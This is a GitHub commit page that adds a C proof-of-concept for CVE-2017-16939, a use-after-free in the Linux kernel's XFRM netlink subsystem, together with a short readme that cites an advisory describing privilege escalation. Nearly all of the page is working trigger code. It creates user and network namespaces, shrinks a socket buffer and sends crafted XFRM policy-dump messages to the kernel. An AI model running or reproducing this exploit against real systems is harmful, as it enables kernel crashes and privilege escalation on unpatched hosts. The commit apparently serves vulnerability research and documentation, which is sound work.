Skip to content

Navigation Menu

Sign in
Appearance settings

Search code, repositories, users, issues, pull requests...

Provide feedback

We read every piece of feedback, and take your input very seriously.

Saved searches

Use saved searches to filter your results more quickly
Sign up
Appearance settings

Commit da125cc

Browse files
author
Aaron Lewis
committed
1 parent 9dfb3b9 commit da125cc

File tree

2 files changed

+105
-0
lines changed

2 files changed

+105
-0
lines changed

‎2017/CVE-2017-16939/cve-2017-16939.c‎

Lines changed: 95 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,95 @@
1+
#include <string.h>
2+
#include <stdio.h>
3+
#include <stdlib.h>
4+
#include <asm/types.h>
5+
#include <sys/socket.h>
6+
#include <netinet/in.h>
7+
#include <arpa/inet.h>
8+
#include <linux/netlink.h>
9+
#include <linux/xfrm.h>
10+
#include <sched.h>
11+
#include <unistd.h>
12+
13+
#define BUFSIZE 2048
14+
15+
16+
int fd;
17+
struct sockaddr_nl addr;
18+
19+
struct msg_policy {
20+
struct nlmsghdr msg;
21+
char buf[BUFSIZE];
22+
};
23+
24+
void create_nl_socket(void)
25+
{
26+
fd = socket(PF_NETLINK,SOCK_RAW,NETLINK_XFRM);
27+
memset(&addr,0,sizeof(struct sockaddr_nl));
28+
addr.nl_family = AF_NETLINK;
29+
addr.nl_pid = 0; /* packet goes into the kernel */
30+
addr.nl_groups = XFRMNLGRP_NONE; /* no need for multicast group */
31+
32+
}
33+
34+
void do_setsockopt(void)
35+
{
36+
int var =0x100;
37+
38+
setsockopt(fd,1,SO_RCVBUF,&var,sizeof(int));
39+
}
40+
41+
struct msg_policy *init_policy_dump(int size)
42+
{
43+
struct msg_policy *r;
44+
45+
r = malloc(sizeof(struct msg_policy));
46+
if(r == NULL) {
47+
perror("malloc");
48+
exit(-1);
49+
}
50+
memset(r,0,sizeof(struct msg_policy));
51+
52+
r->msg.nlmsg_len = 0x10;
53+
r->msg.nlmsg_type = XFRM_MSG_GETPOLICY;
54+
r->msg.nlmsg_flags = NLM_F_MATCH | NLM_F_MULTI | NLM_F_REQUEST;
55+
r->msg.nlmsg_seq = 0x1;
56+
r->msg.nlmsg_pid = 2;
57+
return r;
58+
59+
}
60+
int send_msg(int fd,struct nlmsghdr *msg)
61+
{
62+
int err;
63+
err = sendto(fd,(void *)msg,msg->nlmsg_len,0,(struct sockaddr*)&addr,sizeof(struct sockaddr_nl));
64+
if (err < 0) {
65+
perror("sendto");
66+
return -1;
67+
}
68+
return 0;
69+
70+
}
71+
72+
void create_ns(void)
73+
{
74+
if(unshare(CLONE_NEWUSER) != 0) {
75+
perror("unshare(CLONE_NEWUSER)");
76+
exit(1);
77+
}
78+
if(unshare(CLONE_NEWNET) != 0) {
79+
perror("unshared(CLONE_NEWUSER)");
80+
exit(2);
81+
}
82+
}
83+
int main(int argc,char **argv)
84+
{
85+
struct msg_policy *p;
86+
create_ns();
87+
88+
create_nl_socket();
89+
p = init_policy_dump(100);
90+
do_setsockopt();
91+
send_msg(fd,&p->msg);
92+
p = init_policy_dump(1000);
93+
send_msg(fd,&p->msg);
94+
return 0;
95+
}

‎2017/CVE-2017-16939/readme.md‎

Lines changed: 10 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,10 @@
1+
### CVE-2017-16939
2+
3+
[来源: SSD Advisory – Linux Kernel XFRM Privilege Escalation](https://blogs.securiteam.com/index.php/archives/3535)
4+
5+
### 漏洞概要
6+
7+
The following advisory describes a Use-after-free vulnerability found in Linux kernel that can lead to privilege escalation. The vulnerability found in Netlink socket subsystem – XFRM.
8+
9+
Netlink is used to transfer information between the kernel and user-space processes. It consists of a standard sockets-based interface for user space processes and an internal kernel API for kernel modules.
10+

0 commit comments

Comments
(0)

AltStyle によって変換されたページ (->オリジナル) /